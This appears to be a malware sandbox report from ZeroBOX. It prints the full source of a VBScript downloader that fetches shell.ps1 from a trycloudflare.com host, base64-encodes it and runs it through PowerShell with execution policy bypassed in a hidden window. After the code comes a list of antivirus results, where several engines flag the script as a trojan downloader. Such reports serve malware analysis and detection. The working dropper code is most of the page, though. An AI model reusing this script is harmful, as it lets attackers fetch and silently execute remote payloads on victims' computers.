Static | ZeroBOX
No static analysis available.
Dim url, objHTTP, objShell, scriptContent, encodedCommand
' Define URL of the PowerShell script
url = "https://dat-voip-sit-cio.trycloudflare.com/shell.ps1"
' Create XMLHTTP object to download the file
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
objHTTP.Open "GET", url, False
objHTTP.Send
If objHTTP.Status = 200 Then
scriptContent = objHTTP.responseText
encodedCommand = Base64Encode(scriptContent)
' Execute PowerShell script in-memory
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -EncodedCommand " & encodedCommand, 0, True
End If
' Cleanup
Set objHTTP = Nothing
Set objShell = Nothing
' Base64 Encoding Functions
Function Base64Encode(sText)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.nodeTypedValue = Stream_StringToBytes(sText)
Base64Encode = Replace(oNode.text, vbLf, "")
End Function
Function Stream_StringToBytes(sText)
Dim oStream
Set oStream = CreateObject("ADODB.Stream")
oStream.Type = 2 ' Text
oStream.Charset = "utf-16le" ' PowerShell uses UTF-16LE
oStream.Open
oStream.WriteText sText
oStream.Position = 0
oStream.Type = 1 ' Binary
oStream.Position = 2 ' Skip UTF-16LE BOM
Stream_StringToBytes = oStream.Read
oStream.Close
End Function
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.VBS.Dropper.zp
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-Script.Save.d1d20a66
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 VBS/TrojanDownloader.Agent.ABVR
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan.VBS.Alien.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
CMC Clean
Emsisoft Clean
huorong Clean
FireEye Clean
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:VBS/Obfuse.ZDO!MTB
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:dnjkLnnaHyD)
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Clean
GData Clean
AVG Clean
Panda Clean
alibabacloud Clean
No IRMA results available.